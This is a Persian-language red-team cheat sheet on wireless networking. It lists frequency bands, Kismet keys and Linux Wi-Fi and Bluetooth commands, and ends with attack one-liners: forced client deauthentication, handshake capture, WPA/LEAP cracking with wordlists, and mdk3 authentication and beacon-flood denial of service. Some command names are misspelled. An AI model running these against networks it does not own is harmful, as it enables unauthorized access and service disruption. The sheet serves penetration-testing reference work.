تیم قرمز

برگه رمز هایی برای نفوذگران

سرآغاز لینوکس ویندوز شبکه نکات و ترفند ها روش کار با ابزار ها وب پایگاه داده ها برنامه نویسی بی سیم مهندسی معکوس رمزنگاری پنهان نگاری ارزیابی اطلاعات(osint) منابع

بی سیم

نمودار فرکانس ها

تکنولوژی فرکانس
RFID

120-150 kHz (LF)

13.56 MHz (HF)

433 MHz (lJHF)

Keyless Entry

315 MHz (N. Am)

433.92 MHz (Europe,Asia)

Cellular (US)

698-894 MHz

1710-1755 MHz

1850-1910 MHz

2110-2155 MHz

GPS 1227.60,1575.42 MHz
L Band 1-2 GHz
802.15.4 (ZigBee)

868 MHz (Europe)

915 MHz (lJS,Australia)

802.15.1 (Bluetooth) 2.4-2.483.5 GHz
802.11 b/g 2.4 GHz
802.11a 5.0 GHz
802.11 n 2.4/5.0 GHZ
C Band 4-8 GHz
Ku Band 12-18 GHz
K Band 18-26.5 GHz
Ka Band 26.5-40 GHz

Fcc id lookup

https://apps.fcc.gov/oetcf/eas/reports/GenericSearch.cfm

پایگاه داده فرکانس ها

http://www.radioreference.com/apps/db/

منبع Kismet

دستور توضیح
e سرور های kismet
h راهنما
z نمایش تمام صفحه
n شماره شبکه فعلی
m حذف صدا
i جزییات شبکه
t تگ و یا حذف تگ شبکه
s مرتبط سازی لیست شبکه
g گروه بندی شبکه های تگ شده
l نمایش سطوح قدرت کارت شبکه بی سیم
u خذف گروه، گروه فعلی
d نمایش تنظیمات قابل نمایش
c نمایش کاربران شبکه فعلی
r نمودار نرخ بسته ها
L قفل نموده کانال در کانال انتخاب شده
a نمایش آمار شبکه
H بازگشت به کانال عادی
p دریافت نوع بسته
+/- Expand/collapse گروه ها
f مرکز شبکه
CTRL+L نمایش دوباره صفحه
w ردیابی هشدار ها
Q خروج از Kismet
X بستن پنجره popup

دستورات wifi در لینوکس

دستور توضیح
iwconfig تنظیمات interface ها
rfkill list نمایش مشکل wifi
rfkill unblock all روشن نموده wifi
airdump-ng mon0 نظارت بر کلیه interface ها

وصل شده به شبکه نا امن

iwconfig ath0 essid $SSID
ifconfig ath0 up
dhclient ath0

اتصال به wep

iwconfig ath0 essid $SSID key
ifconfig ath0 up
dhclient ath0

اتصال به wpa-psk

iwconfig ath0 essid $SSID
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-psk.conf
dhclient ath0

اتصال به wpa-enterprise

iwconfig ath0 essid $SSID
ifconfig ath0 up
wpa supplicant -B -i ath0 -c wpa-ent.conf
dhclient ath0

بلوتوث در لینوکس

دستور توضیح
hciconfig hci0 up روشن نموده interface بلوتوث
hcitool -i hci0 scan --flush --all جست و جو دستگاه های دارای بلوتوث
sdptool browse BD_ADDR لیست سرویس های باز

hciconfig hci0 name "NAME" class Ox520204

pi scan

انتخاب به عنوان discoverable
pand -K حذف جلسه pand

تست شبکه های wifi در لینوکس

آغاز monitor mode interface

airmon-ng stop ath0
airmon-ng start wifi0
iwconfig ath0 channel $CH

حمله Capture client handshake

airdump-ng -c $CH --bssid $AP -w file athO    #Capture traffic
aireplay-ng -0 10 -a $AP -c $CH athO          #Force client de-auth


حمله Brute force handshake

aircrack-ng -w wordlist capture.cap    # WPA-PSK
asleep -r capture.cap -w dict.asleep   # LEAP
eapmd5pass -r capture.cap -w wordlist  # EAP-HDS



حمله Dos

mdk3    int    a -a $AP    #Auth Flood
mdk3    int    b -c $CH    #Beacon Flood